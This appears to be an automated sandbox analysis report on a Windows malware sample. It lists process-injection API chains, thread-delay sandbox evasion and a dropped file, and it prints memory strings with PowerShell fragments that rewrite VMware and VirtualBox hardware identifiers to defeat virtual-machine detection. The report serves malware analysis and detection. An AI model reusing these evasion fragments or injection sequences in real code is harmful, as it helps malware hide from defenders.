Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe

Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,

4_2_00007FF78AB310C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4262	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5599	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5847	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3921	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 8389	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 1610	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9926	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9872	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2937
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 1287
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6965
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2662

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp

Jump to dropped file

Source: C:\Windows\System32\dwm.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_10-21242
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_9-14042
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_7-28065

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-448

Source: C:\Windows\System32\winlogon.exe	API coverage: 7.8 %
Source: C:\Windows\System32\lsass.exe	API coverage: 8.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.7 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.7 %
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	API coverage: 1.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200	Thread sleep count: 4262 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200	Thread sleep count: 5599 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dialer.exe TID: 2180	Thread sleep count: 91 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656	Thread sleep count: 5847 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2568	Thread sleep count: 3921 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep count: 8389 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep time: -8389000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep count: 1610 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep time: -1610000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 2504	Thread sleep count: 9926 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 2504	Thread sleep time: -9926000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7044	Thread sleep count: 274 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7044	Thread sleep time: -274000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 6228	Thread sleep count: 9872 > 30	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 6228	Thread sleep time: -9872000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep count: 251 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep time: -251000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6324	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6324	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4208	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4208	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3512	Thread sleep count: 248 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3512	Thread sleep time: -248000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3704	Thread sleep count: 199 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3704	Thread sleep time: -199000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4180	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4180	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7096	Thread sleep count: 232 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7096	Thread sleep time: -232000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5724	Thread sleep count: 250 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5724	Thread sleep time: -250000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348	Thread sleep count: 6812 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072	Thread sleep count: 2937 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7156	Thread sleep count: 249 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7156	Thread sleep time: -249000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2996	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 2996	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5740	Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 5740	Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6376	Thread sleep count: 232 > 30
Source: C:\Windows\System32\svchost.exe TID: 6376	Thread sleep time: -232000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3632	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 3632	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 4284	Thread sleep count: 1287 > 30
Source: C:\Windows\System32\dialer.exe TID: 4284	Thread sleep time: -128700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5264	Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 5264	Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416	Thread sleep count: 6965 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416	Thread sleep count: 2662 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1456	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5180	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 5180	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7124	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 7124	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2568	Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 2568	Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6740	Thread sleep count: 221 > 30
Source: C:\Windows\System32\svchost.exe TID: 6740	Thread sleep time: -221000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6404	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 6404	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5744	Thread sleep count: 50 > 30
Source: C:\Windows\System32\svchost.exe TID: 5744	Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3716	Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 3716	Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2656	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 2656	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4192	Thread sleep count: 240 > 30
Source: C:\Windows\System32\svchost.exe TID: 4192	Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 3444	Thread sleep count: 251 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 3444	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4856	Thread sleep count: 247 > 30
Source: C:\Windows\System32\svchost.exe TID: 4856	Thread sleep time: -247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2192	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6200	Thread sleep count: 231 > 30
Source: C:\Windows\System32\svchost.exe TID: 6200	Thread sleep time: -231000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1856	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 1856	Thread sleep time: -251000s >= -30000s

Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BE3C FindFirstFileExW,	7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABE3C FindFirstFileExW,	7_2_00000225DC6ABE3C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBE3C FindFirstFileExW,	8_2_00000202C0AEBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BE3C FindFirstFileExW,	9_2_000002A66130BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BE3C FindFirstFileExW,	10_2_000002BAAE29BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBE3C FindFirstFileExW,	11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABE3C FindFirstFileExW,	12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BE3C FindFirstFileExW,	12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BE3C FindFirstFileExW,	13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BE3C FindFirstFileExW,	14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBE3C FindFirstFileExW,	15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BE3C FindFirstFileExW,	16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BE3C FindFirstFileExW,	17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABE3C FindFirstFileExW,	18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBE3C FindFirstFileExW,	21_2_000002152C3EBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BE3C FindFirstFileExW,	24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BE3C FindFirstFileExW,	26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBE3C FindFirstFileExW,	26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BE3C FindFirstFileExW,	27_2_0000021B47B3BE3C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000000F.00000002.3019665263.000001845BC0A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000031.00000000.1949907163.0000023D1002B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000011.00000000.1818929292.000001D559386000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 0000000A.00000000.1759493693.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: svchost.exe, 00000011.00000003.1837092807.000001D5593A4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svchost.exe, 00000011.00000003.1840991090.000001D559394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 00000011.00000003.1844293495.000001D559C7F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: lsass.exe, 00000008.00000000.1747335581.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2981325405.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2960919454.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1753411970.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1787229019.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2959653113.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.1789041841.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2959031284.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.1799203992.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2971480214.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1816159694.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000009.00000000.1753452137.000002A66062A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000011.00000002.2984001454.000001D558F62000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000011.00000000.1816159694.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2963751898.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 00000011.00000003.1840991090.000001D559394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000011.00000000.1816191216.000001D558643000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000009.00000003.1981446312.000002A660660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000000D.00000002.2956193714.000002295CE00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000011.00000000.1818211836.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dowvmci
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware
Source: svchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000000A.00000000.1759493693.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))

Source: C:\Windows\System32\dialer.exe

